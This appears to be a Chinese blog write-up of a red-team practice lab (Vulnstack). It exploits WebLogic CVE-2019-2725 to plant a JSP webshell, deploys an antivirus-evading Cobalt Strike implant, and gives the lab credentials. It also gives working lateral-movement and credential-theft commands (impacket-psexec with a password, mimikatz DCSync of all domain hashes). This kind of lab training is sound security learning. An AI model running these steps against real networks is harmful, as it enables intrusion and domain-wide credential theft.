ATT&CK实战系列——红队实战

李志宽
• 阅读 312

这是红日的第二套靶场,一开始直接通过域管起的weblogic,有点别扭,建议还是通过本地的用户来起weblogic,漏洞利用的点很多,不要局限于这篇文章,可以多尝试尝试其他漏洞。

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

密码均为:1qaz@WSX

靶场拓扑

ATT&CK实战系列——红队实战

​ 需要自己起一下环境 C:\Oracle\Middleware\user_projects\domains\base_domain\bin\startWebLogic

ATT&CK实战系列——红队实战

端口扫描

nmap -sV -sS -p- -Pn 192.168.85.148

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 7.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ssl/ms-wbt-server?
7001/tcp  open  http               Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
60966/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
MAC Address: 00:0C:29:68:D3:5F (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

80端口是没有东西的,看一下7001端口,这是weblogic的默认端口 访问7001端口,报错页面,应该就能确定这是一个weblogic了

ATT&CK实战系列——红队实战

​ 进入console尝试一下弱口令,结果是不出意外的进不去 直接工具扫一下,直接一把梭了

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

目标机器是存在多个漏洞的,这里使用Weblogic Wls9-async反序列化漏洞,CVE编号为CVE-2019-2725

影响的版本为:Weblogic 10.x, Weblogic 12.1.3 漏洞描述:

该漏洞是由wls9-async组件导致的,该War包在反序列化处理的时候存在缺陷,可以在/_async/AsyncResponseService路径下构造恶意XML,从而导致在未授权的情况下远程命令执行

先上传一个jsp的木马,方便上传下载文件,这里直接用冰蝎自带的木马 将shell写入下面的路径

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

关于weblogic上传路径如何选择可以参考:https://www.cnblogs.com/sstfy/p/10350915.html

然后直接连接http://192.168.85.148:7001/uddiexplorer/shell.jsp即可

ATT&CK实战系列——红队实战

查看一下目标机器的进程,发现是存在360的

ATT&CK实战系列——红队实战

直接丢一个免杀马,上线cs,这里就可以看到这台机器是存在两张网卡

ATT&CK实战系列——红队实战

内网信息收集

首先通过cs抓一下密码,整理一下

本地用户
administrator:Admin@123

域用户 de1ay.com:
mssql:1qaz@WSX
administrator:1qaz@WSX
de1ay:1qaz@WSX

额。。。这里直接拿到域管的密码了,就当看不见,一台机器一台机器的打吧

拿到本地管理员密码,并且目标机器开启3389端口的,尝试登录到机器上,关掉360好做事情

ATT&CK实战系列——红队实战

​ 已经知道目标机器是存在两张网卡的,192.168.85.1/24和10.10.10.1/24 上传fscan扫描一下这两个段 扫描192.168.85.1/24发现还存在一台192.168.85.151的机器,并且存在ms170-10漏洞

ATT&CK实战系列——红队实战

扫描10.10.10.1/24网段,10.10.10.10和10.10.10.201均存在ms17010漏洞

ATT&CK实战系列——红队实战

​ 10.10.10.201和192.168.85.151是一台机器

基本可以确定这两个网段存活的主机了 整理一下主机信息

DC$     DC.de1ay.com    10.10.10.10
PC$     PC.de1ay.com    10.10.10.201,192.168.85.151
WEB$    WEB.de1ay.com   10.10.10.80,192.168.85.148

域管:administrator:1qaz@WSX
域用户:de1ay:1qaz@WSX,mssql:1qaz@WSX

既然PC这台机器是有外网IP的,那么直接通过msf打一下ms170-010 不出意外根本打不通

ATT&CK实战系列——红队实战

3389端口也连接不上....

先放一下看一下域控吧 设置一下cs的代理 可直接通过de1ay用户横向到DC,并且是system权限

proxychains4 impacket-psexec de1ay.com/de1ay:1qaz@WSX@10.10.10.10

ATT&CK实战系列——红队实战

直接通过cs自带的功能上线DC

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

​ 上传mimikatz直接通过dcsync获取域内所有用户的hash

lsadump::dcsync /domain:de1ay.com /all /csv

ATT&CK实战系列——红队实战

​ 直接通过域管的hash上线PC机器,三台机器全部上线cs

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

​ 看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了

我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。

干货主要有:

①2000多本网安必看电子书(主流和经典的书籍应该都有了)

②PHP标准库资料(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ 网络安全基础入门、Linux运维,web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ 渗透测试工具大全

⑦ 2023网络安全/Web安全/渗透测试工程师面试手册大全

各位朋友们可以关注+评论一波 然后点击下方 即可免费拿捏

【2023全套渗透测试教程点击获取】

点赞
收藏
评论区
推荐文章
Wesley13 Wesley13
3年前
java反序列化——XMLDecoder反序列化漏洞
前言最近学习java反序列化学到了weblogic部分,weblogic之前的两个反序列化漏洞不涉及T3协议之类的,只是涉及到了XMLDecoder反序列化导致漏洞,但是网上大部分的文章都只讲到了触发XMLDecoder部分就结束了,并没有讲为什么XMLDecoder会触发反序列化导致命令执行。于是带着好奇的我就跟着调了一下XMLDecoder的
李志宽 李志宽
2年前
核弹级漏洞!我把log4j扒给你看!
大家好,我是周杰伦。相信大家这两天应该被这么一条新闻刷屏了:这个漏洞到底是怎么回事?核弹级,真的有那么厉害吗?怎么利用这个漏洞呢?我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。这篇文章,我尝试让所有技术相关的朋友都能看懂:这个注定会载入网络
待兔 待兔
3年前
Dart官方文档翻译(一)(Dart之旅)
这篇文章将会向你展示如何使用Dart的每一个知识点,包括变量,操作符,类,类库,但这是在你已经有一个其他语言的编码经验的前提下。为了学习Dart更多关于Dart的核心类库,请查看ATouroftheDartLibraries,当你想知道更多语言特征,挺查阅Dartlanguagespecification你可以通过DartPad来尝试
Stella981 Stella981
3年前
Linux应急响应(三):挖矿病毒
0x00前言随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、WeblogicWLS组件漏洞、Jboss
Stella981 Stella981
3年前
Linux提权的几种常用方式
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(DirtyCow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现D
Stella981 Stella981
3年前
APT攻击利器-Word漏洞CVE
一、概述近期,百度安全实验室反高级威胁团队截获多封利用MicrosoftOfficeWord漏洞进行攻击的恶意邮件。通过对邮件附件样本进一步分析发现,其利用的漏洞为澳洲国防部计算机应急响应中心提交的CVE20167193。该漏洞为RTF文件解析漏洞,成功利用该漏洞可以远程执行任意代码。我们拦截的样本双击打开后会在本地释放后门程序
Wesley13 Wesley13
3年前
JAVA 反序列化攻击
Java反序列化攻击漏洞由FoxGlove的最近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。由于目前发现该漏洞存在于Apachecommonscollections,Apachexalan和Groovy包中,也就意味着使用了这些包的服务器(目前发现有WebSphere,WebLogic,
Stella981 Stella981
3年前
Kerberos无约束委派的攻击和防御
 0x00前言简介当ActiveDirectory首次与Windows2000Server一起发布时,Microsoft就提供了一种简单的机制来支持用户通过Kerberos对Web服务器进行身份验证并需要授权用户更新后端数据库服务器上的记录的方案。这通常被称为Kerberosdoublehopissue(双跃点问题),
Stella981 Stella981
3年前
CRLF在过滤XSS语句后打Cookie方式
     看了很长时间的漏洞奖励计划,学到了不少骚姿势,我觉得这个姿势很不错,总结下写篇文章发出来。针对CRLF漏洞打cookie的方法。     这里不讲概念挖掘方式了,以实战为主:          阅读文章前先参考文章:http://www.ruanyifeng.com/blog/2016/04/cors.html          这篇文
h4ckb0ss h4ckb0ss
3个月前
SSRF(一):PortSwigger靶场笔记
写在前面该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记使用的工具为BurpSuitePro有问题请留言或联系邮箱1586937085@qq.com漏洞简介SSRF全称ServerSideRequestForgery(服务端请求伪
李志宽
李志宽
Lv1
男 · 长沙幻音科技有限公司 · 网络安全工程师
李志宽、前百创作者、渗透测试专家、闷骚男一位、有自己的摇滚乐队
文章
89
粉丝
25
获赞
43